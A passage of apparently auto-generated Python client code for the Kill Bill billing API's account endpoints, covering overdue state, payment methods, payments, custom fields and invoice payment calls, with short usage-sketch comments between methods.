async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
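
    # Minimal usage sketch for get_invoices_for_account, assuming a configured
    # `account_api` and a valid `account_id`; here only unpaid invoices are fetched:
    #
    #     unpaid = account_api.get_invoices_for_account(
    #         account_id, unpaid_invoices_only=True)
    #     # returns a list of Invoice models
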
def get_overdue_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve overdue state for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_overdue_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: OverdueState
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_overdue_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_overdue_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_overdue_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve overdue state for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_overdue_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: OverdueState
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_overdue_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_overdue_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_overdue_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/overdue', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OverdueState', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
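
    # Minimal usage sketch for get_overdue_account, assuming a configured
    # `account_api` and a valid `account_id`:
    #
    #     overdue = account_api.get_overdue_account(account_id)
    #     print(overdue)  # an OverdueState model describing the current overdue phase
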
def get_payment_methods_for_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account payment methods # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_payment_methods_for_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_plugin_info:
:param Bool included_deleted:
:param List[Str] plugin_property:
:param Str audit:
:return: List[PaymentMethod]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_payment_methods_for_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_payment_methods_for_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_payment_methods_for_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account payment methods # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_payment_methods_for_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_plugin_info:
:param Bool included_deleted:
:param List[Str] plugin_property:
:param Str audit:
:return: List[PaymentMethod]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'with_plugin_info', 'included_deleted', 'plugin_property', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_payment_methods_for_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_payment_methods_for_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_payment_methods_for_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'with_plugin_info' in params:
query_params.append(('withPluginInfo', params['with_plugin_info'])) # noqa: E501
if 'included_deleted' in params:
query_params.append(('includedDeleted', params['included_deleted'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/paymentMethods', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[PaymentMethod]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
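
    # Minimal usage sketch for get_payment_methods_for_account, assuming a configured
    # `account_api` and a valid `account_id`:
    #
    #     methods = account_api.get_payment_methods_for_account(
    #         account_id, included_deleted=False)
    #     # returns a list of PaymentMethod models
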
def get_payments_for_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account payments # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_payments_for_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_attempts:
:param Bool with_plugin_info:
:param List[Str] plugin_property:
:param Str audit:
:return: List[Payment]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_payments_for_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_payments_for_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_payments_for_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account payments # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_payments_for_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_attempts:
:param Bool with_plugin_info:
:param List[Str] plugin_property:
:param Str audit:
:return: List[Payment]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'with_attempts', 'with_plugin_info', 'plugin_property', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_payments_for_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_payments_for_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_payments_for_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'with_attempts' in params:
query_params.append(('withAttempts', params['with_attempts'])) # noqa: E501
if 'with_plugin_info' in params:
query_params.append(('withPluginInfo', params['with_plugin_info'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/payments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Payment]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
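
    # Minimal usage sketch for get_payments_for_account, assuming a configured
    # `account_api` and a valid `account_id`:
    #
    #     payments = account_api.get_payments_for_account(
    #         account_id, with_attempts=True)
    #     # returns a list of Payment models
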
def modify_account_custom_fields(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Modify custom fields to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.modify_account_custom_fields(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[CustomField] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.modify_account_custom_fields_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.modify_account_custom_fields_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def modify_account_custom_fields_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Modify custom fields to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.modify_account_custom_fields_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[CustomField] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_account_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `modify_account_custom_fields`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `modify_account_custom_fields`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `modify_account_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `modify_account_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/customFields', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
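
    # Minimal usage sketch for modify_account_custom_fields, assuming a configured
    # `account_api`, a valid `account_id`, an existing custom field UUID in
    # `field_id`, and that the CustomField model accepts the keyword arguments shown:
    #
    #     field = killbill.CustomField(custom_field_id=field_id,
    #                                  name='team', value='emea')
    #     account_api.modify_account_custom_fields(
    #         account_id, [field], created_by='demo')
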
def pay_all_invoices(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment for all unpaid invoices # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.pay_all_invoices(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param Bool external_payment:
:param Float payment_amount:
:param Date target_date:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: List[Invoice]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.pay_all_invoices_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.pay_all_invoices_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def pay_all_invoices_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment for all unpaid invoices # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.pay_all_invoices_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param Bool external_payment:
:param Float payment_amount:
:param Date target_date:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: List[Invoice]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'payment_method_id', 'external_payment', 'payment_amount', 'target_date', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method pay_all_invoices" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `pay_all_invoices`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `pay_all_invoices`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `pay_all_invoices`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'payment_method_id' in params:
query_params.append(('paymentMethodId', params['payment_method_id'])) # noqa: E501
if 'external_payment' in params:
query_params.append(('externalPayment', params['external_payment'])) # noqa: E501
if 'payment_amount' in params:
query_params.append(('paymentAmount', params['payment_amount'])) # noqa: E501
if 'target_date' in params:
query_params.append(('targetDate', params['target_date'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/invoicePayments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Invoice]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
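
    # Minimal usage sketch for pay_all_invoices, assuming a configured `account_api`
    # and a valid `account_id`; `created_by` is an arbitrary audit string:
    #
    #     paid_invoices = account_api.pay_all_invoices(
    #         account_id, created_by='demo', external_payment=True)
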
def process_payment(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment (authorization, purchase or credit) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.process_payment(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param PaymentTransaction body: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: Payment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.process_payment_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.process_payment_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def process_payment_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment (authorization, purchase or credit) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.process_payment_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param PaymentTransaction body: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: Payment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'payment_method_id', 'control_plugin_name', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method process_payment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `process_payment`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `process_payment`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `process_payment`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `process_payment`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'payment_method_id' in params:
query_params.append(('paymentMethodId', params['payment_method_id'])) # noqa: E501
if 'control_plugin_name' in params:
query_params.append(('controlPluginName', params['control_plugin_name'])) # noqa: E501
collection_formats['controlPluginName'] = 'multi' # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/payments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Payment', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
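
    # Minimal usage sketch for process_payment, assuming a configured `account_api`,
    # a valid `account_id`, and that the PaymentTransaction model accepts the keyword
    # arguments shown (all values illustrative):
    #
    #     txn = killbill.PaymentTransaction(transaction_type='PURCHASE',
    #                                       amount=10.0, currency='USD')
    #     payment = account_api.process_payment(account_id, txn, created_by='demo')
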
def process_payment_by_external_key(self, body=None, external_key=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment using the account external key (authorization, purchase or credit) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.process_payment_by_external_key(body, external_key, created_by, async=True)
>>> result = thread.get()
:param async bool
:param PaymentTransaction body: (required)
:param Str external_key: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: Payment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.process_payment_by_external_key_with_http_info(body, external_key, created_by, **kwargs) # noqa: E501
else:
(data) = self.process_payment_by_external_key_with_http_info(body, external_key, created_by, **kwargs) # noqa: E501
return data
def process_payment_by_external_key_with_http_info(self, body=None, external_key=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment using the account external key (authorization, purchase or credit) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.process_payment_by_external_key_with_http_info(body, external_key, created_by, async=True)
>>> result = thread.get()
:param async bool
:param PaymentTransaction body: (required)
:param Str external_key: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: Payment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'external_key', 'created_by', 'payment_method_id', 'control_plugin_name', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method process_payment_by_external_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `process_payment_by_external_key`") # noqa: E501
# verify the required parameter 'external_key' is set
if ('external_key' not in params or
params['external_key'] is None):
raise ValueError("Missing the required parameter `external_key` when calling `process_payment_by_external_key`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `process_payment_by_external_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'external_key' in params:
query_params.append(('externalKey', params['external_key'])) # noqa: E501
if 'payment_method_id' in params:
query_params.append(('paymentMethodId', params['payment_method_id'])) # noqa: E501
if 'control_plugin_name' in params:
query_params.append(('controlPluginName', params['control_plugin_name'])) # noqa: E501
collection_formats['controlPluginName'] = 'multi' # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/payments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Payment', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
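
    # Minimal usage sketch for process_payment_by_external_key; same assumptions as
    # the process_payment sketch above, with the account identified by its external
    # key instead of its UUID:
    #
    #     payment = account_api.process_payment_by_external_key(
    #         txn, account_external_key, created_by='demo')
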
def rebalance_existing_cba_on_account(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Rebalance account CBA # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.rebalance_existing_cba_on_account(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.rebalance_existing_cba_on_account_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.rebalance_existing_cba_on_account_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def rebalance_existing_cba_on_account_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Rebalance account CBA # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.rebalance_existing_cba_on_account_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method rebalance_existing_cba_on_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `rebalance_existing_cba_on_account`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `rebalance_existing_cba_on_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `rebalance_existing_cba_on_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
